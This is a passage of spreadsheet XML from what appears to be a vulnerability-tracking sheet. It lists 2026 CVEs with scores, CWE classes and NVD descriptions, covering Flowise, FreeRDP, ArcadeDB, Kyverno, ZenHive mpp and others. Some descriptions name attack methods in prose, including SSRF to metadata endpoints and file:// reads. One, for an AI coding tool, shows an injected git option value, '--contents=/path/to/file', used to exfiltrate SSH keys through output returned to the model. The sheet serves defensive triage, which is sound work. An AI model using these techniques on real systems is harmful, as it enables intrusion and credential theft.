      <c r="J1662" s="5" t="inlineStr"/>
      <c r="K1662" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-639</t>
        </is>
      </c>
      <c r="L1662" s="5" t="inlineStr">
        <is>
          <t>Flowise is a drag &amp; drop user interface to build a customized large language model flow. Prior to 3.1.3, several organization billing endpoints in packages/server/src/enterprise/routes/organization.route.ts and packages/server/src/enterprise/controllers/organization.controller.ts accept attacker-controlled Stripe subscriptionId values without verifying that the identifier belongs to the authenticated user's organization. An authenticated attacker can perform unauthorized Stripe subscription operations on other tenants, including changing subscription plans or modifying seat quantities, resulting in financial impact and service disruption. This issue is fixed in 3.1.3.</t>
        </is>
      </c>
      <c r="M1662" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70476</t>
        </is>
      </c>
    </row>
    <row r="1663">
      <c r="A1663" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1663" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73241</t>
        </is>
      </c>
      <c r="C1663" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1663" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1663" s="5" t="inlineStr"/>
      <c r="F1663" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1663" s="5" t="inlineStr"/>
      <c r="H1663" s="5" t="inlineStr"/>
      <c r="I1663" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J1663" s="5" t="inlineStr"/>
      <c r="K1663" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L1663" s="5" t="inlineStr">
        <is>
          <t>FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.30.0, FreeRDP server-side RDSTLS in libfreerdp/core/rdstls.c accepts an attacker-supplied RDSTLS_TYPE_CAPABILITIES PDU while rdstls_server_authenticate is waiting for RDSTLS_TYPE_AUTHREQ, leaving resultCode at RDSTLS_RESULT_SUCCESS and allowing a remote unauthenticated client to bypass the RedirectionGuid, username, domain, or password checks. This issue is fixed in version 3.30.0.</t>
        </is>
      </c>
      <c r="M1663" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73241</t>
        </is>
      </c>
    </row>
    <row r="1664">
      <c r="A1664" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1664" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73242</t>
        </is>
      </c>
      <c r="C1664" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1664" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1664" s="5" t="inlineStr"/>
      <c r="F1664" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1664" s="5" t="inlineStr"/>
      <c r="H1664" s="5" t="inlineStr"/>
      <c r="I1664" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J1664" s="5" t="inlineStr"/>
      <c r="K1664" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1664" s="5" t="inlineStr">
        <is>
          <t>FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.30.0, FreeRDP's winpr/libwinpr/sspi/Kerberos/kerberos.c kerberos_DecryptMessage function fails to bound the peer-controlled GSS Wrap-token EC field before using it with RRC in IOV pointer offsets, allowing a malicious RDP peer to trigger out-of-bounds reads and in-place writes during CredSSP/NLA Kerberos decryption. This issue is fixed in version 3.30.0.</t>
        </is>
      </c>
      <c r="M1664" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73242</t>
        </is>
      </c>
    </row>
    <row r="1665">
      <c r="A1665" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1665" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73292</t>
        </is>
      </c>
      <c r="C1665" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1665" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1665" s="5" t="inlineStr"/>
      <c r="F1665" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1665" s="5" t="inlineStr"/>
      <c r="H1665" s="5" t="inlineStr"/>
      <c r="I1665" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J1665" s="5" t="inlineStr"/>
      <c r="K1665" s="5" t="inlineStr">
        <is>
          <t>CWE-352, CWE-620</t>
        </is>
      </c>
      <c r="L1665" s="5" t="inlineStr">
        <is>
          <t>Semaphore UI is a web interface for managing DevOps tools. Prior to 2.18.21, the /api/users/{id}/password endpoint accepts a cross-site request using the authenticated user's semaphore session cookie without CSRF protection or current-password confirmation, allowing an unauthenticated attacker to change an administrator's or another user's password after user interaction. This issue is fixed in version 2.18.21.</t>
        </is>
      </c>
      <c r="M1665" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73292</t>
        </is>
      </c>
    </row>
    <row r="1666">
      <c r="A1666" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1666" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73541</t>
        </is>
      </c>
      <c r="C1666" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1666" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1666" s="5" t="inlineStr"/>
      <c r="F1666" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1666" s="5" t="inlineStr"/>
      <c r="H1666" s="5" t="inlineStr">
        <is>
          <t>zenhive:machine_payments_protocol</t>
        </is>
      </c>
      <c r="I1666" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1666" s="5" t="inlineStr"/>
      <c r="K1666" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L1666" s="5" t="inlineStr">
        <is>
          <t>Allocation of Resources Without Limits or Throttling in ZenHive mpp allows an unauthenticated remote client to drain the fee-payer wallet through concurrent sponsored payments, denying service to legitimate payers once it is empty.
MPP.Methods.Tempo.FeePayerPolicy enforces its ceilings (max_gas, max_fee_per_gas, max_priority_fee_per_gas, the worst-case gas_limit * max_fee_per_gas &lt;= max_total_fee budget cap, and a validity window) against one transaction at a time, and nothing accounts for exposure across concurrent requests. reserve_hash_atomic/2 is keyed on the transaction hash, so it prevents duplicate broadcast of the same signed transaction but not N distinct sponsored transactions carrying distinct expiring nonces. Committed sponsor exposure is therefore N times max_total_fee, bounded by nothing in the library, and the default 900 second validity window lets co-signed transactions stay broadcastable and uncounted for that entire period.
This issue affects mpp: from 0.2.0 before 0.12.0.</t>
        </is>
      </c>
      <c r="M1666" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73541</t>
        </is>
      </c>
    </row>
    <row r="1667">
      <c r="A1667" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1667" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75842</t>
        </is>
      </c>
      <c r="C1667" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1667" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1667" s="5" t="inlineStr"/>
      <c r="F1667" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1667" s="5" t="inlineStr"/>
      <c r="H1667" s="5" t="inlineStr"/>
      <c r="I1667" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1667" s="5" t="inlineStr"/>
      <c r="K1667" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1667" s="5" t="inlineStr">
        <is>
          <t>ArcadeDB versions before 26.8.1 contain an arbitrary file read vulnerability in the OpenCypher LOAD CSV FROM clause that allows authenticated users to read local files. Attackers with read query privileges can use the file:// protocol in LOAD CSV statements to access arbitrary files with server process privileges, exfiltrating sensitive data directly in query responses.</t>
        </is>
      </c>
      <c r="M1667" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75842</t>
        </is>
      </c>
    </row>
    <row r="1668">
      <c r="A1668" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1668" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75912</t>
        </is>
      </c>
      <c r="C1668" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1668" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1668" s="5" t="inlineStr"/>
      <c r="F1668" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1668" s="5" t="inlineStr"/>
      <c r="H1668" s="5" t="inlineStr"/>
      <c r="I1668" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1668" s="5" t="inlineStr"/>
      <c r="K1668" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="L1668" s="5" t="inlineStr">
        <is>
          <t>CodeWhale versions before 0.8.64 contain an argument injection vulnerability in the git_blame tool that allows attackers to read arbitrary files by injecting git options into the unvalidated rev parameter. Attackers can supply rev values like --contents=/path/to/file to exfiltrate sensitive files such as SSH keys and credentials through the tool output returned to the model.</t>
        </is>
      </c>
      <c r="M1668" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75912</t>
        </is>
      </c>
    </row>
    <row r="1669">
      <c r="A1669" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1669" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76225</t>
        </is>
      </c>
      <c r="C1669" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1669" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1669" s="5" t="inlineStr"/>
      <c r="F1669" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1669" s="5" t="inlineStr"/>
      <c r="H1669" s="5" t="inlineStr"/>
      <c r="I1669" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1669" s="5" t="inlineStr"/>
      <c r="K1669" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1669" s="5" t="inlineStr">
        <is>
          <t>ArcadeDB before 26.8.1 contains a server-side request forgery vulnerability in the OpenCypher LOAD CSV implementation that fails to validate HTTP/HTTPS URLs. Authenticated attackers can craft LOAD CSV queries pointing to internal network addresses or cloud metadata endpoints to make the ArcadeDB server fetch and return sensitive data from restricted services.</t>
        </is>
      </c>
      <c r="M1669" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76225</t>
        </is>
      </c>
    </row>
    <row r="1670">
      <c r="A1670" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1670" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77104</t>
        </is>
      </c>
      <c r="C1670" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1670" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1670" s="5" t="inlineStr"/>
      <c r="F1670" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1670" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1670" s="5" t="inlineStr">
        <is>
          <t>commvault:commvault, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="I1670" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1670" s="5" t="inlineStr"/>
      <c r="K1670" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1670" s="5" t="inlineStr">
        <is>
          <t>CommServe contained a path traversal issue affecting information disclosure. Software customers upgrade to resolved maintenance release. Update CommServe.</t>
        </is>
      </c>
      <c r="M1670" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77104</t>
        </is>
      </c>
    </row>
    <row r="1671">
      <c r="A1671" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1671" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80469</t>
        </is>
      </c>
      <c r="C1671" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1671" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1671" s="5" t="inlineStr"/>
      <c r="F1671" s="5" t="inlineStr"/>
      <c r="G1671" s="5" t="inlineStr"/>
      <c r="H1671" s="5" t="inlineStr"/>
      <c r="I1671" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J1671" s="5" t="inlineStr"/>
      <c r="K1671" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L1671" s="5" t="inlineStr">
        <is>
          <t>An attacker may achieve arbitrary code execution on a target system by uploading a malicious device driver package, bypassing driver verification mechanisms, and triggering the execution of
attacker-controlled code. User interaction is required.</t>
        </is>
      </c>
      <c r="M1671" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80469</t>
        </is>
      </c>
    </row>
    <row r="1672">
      <c r="A1672" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1672" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81821</t>
        </is>
      </c>
      <c r="C1672" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1672" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1672" s="5" t="inlineStr"/>
      <c r="F1672" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1672" s="5" t="inlineStr"/>
      <c r="H1672" s="5" t="inlineStr"/>
      <c r="I1672" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1672" s="5" t="inlineStr"/>
      <c r="K1672" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="L1672" s="5" t="inlineStr">
        <is>
          <t>The vulnerability, if exploited, could allow a miscreant with read access to PIMBoards project files to decrypt and view sensitive information.</t>
        </is>
      </c>
      <c r="M1672" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81821</t>
        </is>
      </c>
    </row>
    <row r="1673">
      <c r="A1673" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1673" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81822</t>
        </is>
      </c>
      <c r="C1673" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1673" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1673" s="5" t="inlineStr"/>
      <c r="F1673" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1673" s="5" t="inlineStr"/>
      <c r="H1673" s="5" t="inlineStr"/>
      <c r="I1673" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1673" s="5" t="inlineStr"/>
      <c r="K1673" s="5" t="inlineStr">
        <is>
          <t>CWE-327</t>
        </is>
      </c>
      <c r="L1673" s="5" t="inlineStr">
        <is>
          <t>The vulnerability, if exploited, could allow a miscreant with read access to PIMBoards project files to reverse engineer PIMBoards users’ app-native passwords through computational brute-forcing of weak hashes, potentially allowing elevation to a PIMBoards administrator user.</t>
        </is>
      </c>
      <c r="M1673" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81822</t>
        </is>
      </c>
    </row>
    <row r="1674">
      <c r="A1674" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1674" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82404</t>
        </is>
      </c>
      <c r="C1674" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1674" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1674" s="5" t="inlineStr"/>
      <c r="F1674" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1674" s="5" t="inlineStr"/>
      <c r="H1674" s="5" t="inlineStr"/>
      <c r="I1674" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J1674" s="5" t="inlineStr"/>
      <c r="K1674" s="5" t="inlineStr">
        <is>
          <t>CWE-1321</t>
        </is>
      </c>
      <c r="L1674" s="5" t="inlineStr">
        <is>
          <t>TOON is a compact, human-readable serialization of JSON data for LLM prompts. Prior to 2.3.1, decoding attacker-controlled TOON with a __proto__, constructor, or prototype key wrote through the object prototype chain instead of creating an own property, polluting Object.prototype for the runtime. In packages/toon/src/decode/expand.ts, the expandPaths: 'safe' path and insertPathSafe function made dotted keys such as a.__proto__.x the strongest vector, while plain nested objects, tabular rows, quoted keys, and streaming decode were also affected. The encoder also dropped own __proto__ properties and could invoke an inherited setter during normalization. Services that decode untrusted TOON could experience denial of service or, when a suitable downstream gadget is present, remote code execution. This issue is fixed in version 2.3.1.</t>
        </is>
      </c>
      <c r="M1674" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82404</t>
        </is>
      </c>
    </row>
    <row r="1675">
      <c r="A1675" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1675" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82662</t>
        </is>
      </c>
      <c r="C1675" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1675" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1675" s="5" t="inlineStr"/>
      <c r="F1675" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1675" s="5" t="inlineStr"/>
      <c r="H1675" s="5" t="inlineStr"/>
      <c r="I1675" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J1675" s="5" t="inlineStr"/>
      <c r="K1675" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L1675" s="5" t="inlineStr">
        <is>
          <t>Nodemailer before 8.0.8 disables TLS certificate verification in lib/fetch/index.js through rejectUnauthorized: false, allowing attackers to intercept OAuth2 token requests. Attackers in a machine-in-the-middle position can capture OAuth client secrets, refresh tokens, and access tokens transmitted over compromised HTTPS connections.</t>
        </is>
      </c>
      <c r="M1675" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82662</t>
        </is>
      </c>
    </row>
    <row r="1676">
      <c r="A1676" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1676" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82750</t>
        </is>
      </c>
      <c r="C1676" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1676" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1676" s="5" t="inlineStr"/>
      <c r="F1676" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1676" s="5" t="inlineStr"/>
      <c r="H1676" s="5" t="inlineStr"/>
      <c r="I1676" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J1676" s="5" t="inlineStr"/>
      <c r="K1676" s="5" t="inlineStr">
        <is>
          <t>CWE-1284</t>
        </is>
      </c>
      <c r="L1676" s="5" t="inlineStr">
        <is>
          <t>Improper Validation of Specified Quantity in Input in ZenHive mpp allows an unauthenticated remote client to inflate the fee-payer's gas cost per sponsored payment by a large multiplier and to have the sponsor pay for EIP-7702 account delegations of the client's choosing.
When the server sponsors Tempo payments, MPP.Methods.Tempo.FeePayerPolicy.measure/3 in lib/mpp/methods/tempo/fee_payer_policy.ex bounds the gas fields, the fee budget, the validity window and the access list of the client-signed 0x76 envelope, but never reads its aa_authorization_list field. Every signed delegation in that list is charged as intrinsic gas before the payment call runs, so a client attaching delegations from throwaway authority keys makes the sponsor pay for them within the default gas_limit ceiling. At the reporter's default of seven entries the sponsored cost rises from about 46,575 gas to about 1,884,087 gas. Because each entry is applied as a persistent set-code delegation, a client can also upgrade its own accounts to delegated code at the sponsor's expense.
This issue affects mpp: from 0.2.0 before 0.16.1.</t>
        </is>
      </c>
      <c r="M1676" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82750</t>
        </is>
      </c>
    </row>
    <row r="1677">
      <c r="A1677" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1677" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82751</t>
        </is>
      </c>
      <c r="C1677" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1677" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1677" s="5" t="inlineStr"/>
      <c r="F1677" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1677" s="5" t="inlineStr"/>
      <c r="H1677" s="5" t="inlineStr"/>
      <c r="I1677" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J1677" s="5" t="inlineStr"/>
      <c r="K1677" s="5" t="inlineStr">
        <is>
          <t>CWE-1284</t>
        </is>
      </c>
      <c r="L1677" s="5" t="inlineStr">
        <is>
          <t>Improper Validation of Specified Quantity in Input in ZenHive mpp allows an unauthenticated remote client to inflate the fee-payer's gas cost per sponsored payment by a large multiplier and to have the sponsor pay for provisioning an access key on the client's own account.
When the server sponsors Tempo payments, MPP.Methods.Tempo.FeePayerPolicy.measure/3 in lib/mpp/methods/tempo/fee_payer_policy.ex bounds the gas fields, the fee budget, the validity window and the access list of the client-signed 0x76 envelope, but does not check whether the envelope carries the optional key_authorization field. A client can attach a fully signed key authorization, provisioning a new access key with token spending limits on its own account, alongside the normal payment call. The key and each limit entry are persistent storage writes billed as intrinsic gas to the sponsor, bounded only by the gas_limit ceiling. At the reporter's default of one key with three token limits the sponsored cost rises from about 46,587 gas to about 1,808,700 gas, and the client keeps a valid access key it paid nothing for.
This issue affects mpp: from 0.2.0 before 0.16.1.</t>
        </is>
      </c>
      <c r="M1677" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82751</t>
        </is>
      </c>
    </row>
    <row r="1678">
      <c r="A1678" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1678" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84173</t>
        </is>
      </c>
      <c r="C1678" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1678" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1678" s="5" t="inlineStr"/>
      <c r="F1678" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1678" s="5" t="inlineStr"/>
      <c r="H1678" s="5" t="inlineStr"/>
      <c r="I1678" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1678" s="5" t="inlineStr"/>
      <c r="K1678" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1678" s="5" t="inlineStr">
        <is>
          <t>In Eclipse Ankaios versions v0.5.1 through v1.0.1, the agent-side Control Interface authorizer incorrectly evaluates multi-segment allow rules whose first path segment is a wildcard. An authenticated workload with access restricted by such a rule can submit a CompleteStateRequest or UpdateStateRequest with an empty field mask. The request may then be incorrectly authorized as matching the scoped rule, allowing the workload to read the complete cluster state or replace state outside its authorized subtree. This may result in unauthorized disclosure or modification of other workloads and cluster configuration. Only a rule consisting solely of * is intended to authorize an empty mask.
Mitigation: Until an update containing the fix is installed, avoid multi-segment Control Interface allow-rule filter masks that begin with a wildcard, such as *.workloads.some_workload. Replace them with explicit paths such as desiredState.workloads.some_workload, where applicable. A filter mask consisting solely of * has different, intentionally unrestricted semantics and should only be used when full-state access is intended.</t>
        </is>
      </c>
      <c r="M1678" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84173</t>
        </is>
      </c>
    </row>
    <row r="1679">
      <c r="A1679" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1679" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84195</t>
        </is>
      </c>
      <c r="C1679" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1679" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1679" s="5" t="inlineStr"/>
      <c r="F1679" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1679" s="5" t="inlineStr"/>
      <c r="H1679" s="5" t="inlineStr"/>
      <c r="I1679" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J1679" s="5" t="inlineStr"/>
      <c r="K1679" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L1679" s="5" t="inlineStr">
        <is>
          <t>Kyverno before 1.16.4 automatically attaches the admission controller's ServiceAccount token to outbound HTTP requests in apiCall service mode without explicit authorization headers. Attackers can exfiltrate the token by directing apiCall requests to external or attacker-controlled endpoints, gaining full control over Kyverno policies and cluster resources.</t>
        </is>
      </c>
      <c r="M1679" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84195</t>
        </is>
      </c>
    </row>
    <row r="1680">
      <c r="A1680" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1680" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84196</t>
        </is>
      </c>
      <c r="C1680" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1680" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1680" s="5" t="inlineStr"/>
      <c r="F1680" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1680" s="5" t="inlineStr"/>
      <c r="H1680" s="5" t="inlineStr"/>
      <c r="I1680" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J1680" s="5" t="inlineStr"/>
      <c r="K1680" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1680" s="5" t="inlineStr">
        <is>
          <t>Kyverno before 1.18.0 contains a server-side request forgery vulnerability in apiCall.service.url that allows authenticated users to send arbitrary HTTP requests by injecting user-controlled input through variable substitution. Attackers can target internal services, cloud metadata endpoints, and loopback addresses, with response data reflected in admission error messages enabling non-blind data exfiltration.</t>
        </is>
      </c>
      <c r="M1680" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84196</t>
        </is>
      </c>
    </row>
    <row r="1681">
      <c r="A1681" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1681" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85048</t>
        </is>
      </c>
      <c r="C1681" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1681" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1681" s="5" t="inlineStr"/>
      <c r="F1681" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1681" s="5" t="inlineStr"/>
      <c r="H1681" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1681" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1681" s="5" t="inlineStr"/>
      <c r="K1681" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1681" s="5" t="inlineStr">
        <is>
          <t>Use after free in Compositing in Google Chrome prior to 152.0.7977.82 allowed a remote attacker who had compromised the renderer process to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M1681" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85048</t>
        </is>
      </c>
    </row>
    <row r="1682">
      <c r="A1682" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1682" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85091</t>
        </is>
      </c>
      <c r="C1682" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1682" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1682" s="5" t="inlineStr"/>
      <c r="F1682" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1682" s="5" t="inlineStr"/>
      <c r="H1682" s="5" t="inlineStr"/>
      <c r="I1682" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1682" s="5" t="inlineStr"/>
